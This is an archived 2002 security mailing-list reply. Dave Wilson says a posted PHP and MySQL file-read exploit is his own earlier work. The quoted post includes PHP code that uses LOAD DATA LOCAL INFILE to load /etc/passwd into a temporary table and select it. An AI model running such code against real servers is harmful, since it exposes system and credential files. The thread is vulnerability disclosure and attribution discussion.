Re: File reading vulnerable in PHP and MySQL (Local Exploit)

• Previous message: Paul Starzetz: "TracerouteNG - never ending story"
• In reply to: Hai Nam Luke: "File reading vulnerable in PHP and MySQL (Local Exploit)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Wed, 27 Nov 2002 09:54:58 +0000
From: Dave Wilson <dw@botanicus.net>
To: Hai Nam Luke <hainamluke@hotmail.com>

Hi there,

Please see http://botanicus.net/dw/sec.html - I wrote about this in
February. Prior to that, other people have claimed to have come across
this too.

On Tue, Nov 26, 2002 at 10:57:52AM -0000, Hai Nam Luke wrote:

> Attacker can use PHP and mySQL to read some local file following this way:
>
> # Create a database (mySQL) and upload this file to your server
> PHP Code: viewfile.php (programmed by Luke)
>
> ======================================================
> <?
> // config this data
> $dbhost = "";
> $dbuser = "";
> $dbpasswd = "";
> $dbname = "";
> $file = "/etc/passwd"; // filename that you wanna view
>
> // shell code
> echo "<pre>";
>
> mysql_connect ($dbhost, $dbuser,
> $dbpasswd);
> $sql = array (
> "USE $dbname",
>
> 'CREATE TEMPORARY TABLE ' . ($tbl
> = 'A'.time
> ()) . ' (a LONGBLOB)',
>
> "LOAD DATA LOCAL INFILE '$file' INTO
> TABLE
> $tbl FIELDS "
> . "TERMINATED BY
> '__THIS_NEVER_HAPPENS__' "
> . "ESCAPED BY '' "
> . "LINES TERMINATED BY
> '__THIS_NEVER_HAPPENS__'",
>
> "SELECT a FROM $tbl LIMIT 1"
> );

Umm, this is my code. Please check any good Bugtraq archive for proof of
this fact. This is pretty much identical, except my English is better
:-).

> Luke (HVA)
> http://www.hackervn.net

Dave Wilson.

• Next message: Casper ***: "Re: Solaris priocntl exploit"
• Previous message: Paul Starzetz: "TracerouteNG - never ending story"
• In reply to: Hai Nam Luke: "File reading vulnerable in PHP and MySQL (Local Exploit)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]